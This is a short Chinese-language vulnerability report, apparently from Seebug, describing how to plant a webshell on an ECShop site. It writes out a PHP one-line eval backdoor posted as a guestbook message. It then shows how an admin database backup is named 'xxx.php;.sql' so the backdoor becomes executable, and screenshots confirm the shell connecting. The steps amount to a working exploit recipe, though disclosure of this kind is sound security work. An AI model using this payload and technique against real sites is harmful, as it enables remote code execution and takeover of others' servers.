### 简要描述:
可以绕过权限上传一句话木马
### 详细说明:
[<img src="https://images.seebug.org/upload/201303/2823392829fd0b83c543d87bb4272f3b475e818f.png" alt="1前台嵌入.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201303/2823392829fd0b83c543d87bb4272f3b475e818f.png)
前台留个言,内容是我们的一句话木马:<?php eval($_POST[cmd]);?>
[<img src="https://images.seebug.org/upload/201303/28234057f2b3fb99c18a7da926cc443a6aa4893a.png" alt="ecshop后台.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201303/28234057f2b3fb99c18a7da926cc443a6aa4893a.png)
接着在后台系统==>数据库管理==>数据备份==>选择自定义备份,选择ecs_feedback这张表(存放留言的表)
[<img src="https://images.seebug.org/upload/201303/2823413265c51f449aea803b9477479e31a534af.png" alt=".png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201303/2823413265c51f449aea803b9477479e31a534af.png)
[<img src="https://images.seebug.org/upload/201303/28234159a4cba4186474a164f8f18745f8851698.png" alt=".png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201303/28234159a4cba4186474a164f8f18745f8851698.png)
备份文件名:xxx.php;.sql 这种格式来备份
[<img src="https://images.seebug.org/upload/201303/28234304f3708e1312922d4b8313e0641aa7d261.png" alt=".png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201303/28234304f3708e1312922d4b8313e0641aa7d261.png)
提示成功了。
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201303/2823440078ad987d1e11a18e3730ca8cd7495dc0.png" alt=".png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201303/2823440078ad987d1e11a18e3730ca8cd7495dc0.png)
一句话连接成功
[<img src="https://images.seebug.org/upload/201303/28234502f810dc442b6502062ab8111b9d295275.png" alt="aa2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201303/28234502f810dc442b6502062ab8111b9d295275.png)
暂无评论